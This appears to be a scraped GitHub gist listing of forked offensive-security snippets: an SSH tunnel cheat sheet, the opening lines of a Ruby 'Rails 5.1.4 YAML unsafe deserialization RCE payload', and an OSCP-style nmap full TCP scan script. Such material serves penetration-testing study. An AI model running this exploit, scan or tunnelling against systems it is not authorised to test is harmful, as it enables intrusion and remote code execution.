# $LOCAL_IP: 'localhost' or machine from local network
# $LOCAL_PORT: open port on local machine
# $REMOTE_IP: remote localhost or IP from remote network
# $REMOTE_PORT: open port on remote site
# Forward Tunnel: map port from remote machine/network on local machine
ssh -L $LOCAL_PORT:$REMOTE_IP:$REMOTE_PORT $USER@$SERVER
# Reverse Tunnel: make local port accessable to remote machine
Cypher134 bradfireborn
bradfireborn
/ railspwn.rb
Created
June 16, 2018 04:22
— forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'yaml' | |
| require 'base64' | |
| require 'erb' | |
| class ActiveSupport | |
| class Deprecation | |
| def initialize() | |
| @silenced = true | |
| end | |
| class DeprecatedInstanceVariableProxy |
bradfireborn
/ ssh-tunnel-cheat-sheet.md
Created
June 9, 2018 08:12
— forked from jkullick/ssh-tunnel-cheat-sheet.md
SSH Tunnel Cheat Sheet
bradfireborn
/ nmap-tcp-full.sh
Created
May 2, 2018 09:10
— forked from coffeegist/nmap-tcp-full.sh
OSCP nmap scripts
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if [ "$#" -ne 3 ]; then | |
| echo "Usage: nmap-tcp-full.sh <TCP-QUICK-RESULTS.XML> <TARGET> <OUTPUT-FILENAME>" | |
| exit 1 | |
| fi | |
| nmap -nvv -Pn -sSV -T1 -p$(cat $1 | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -A -oA $3 $2 |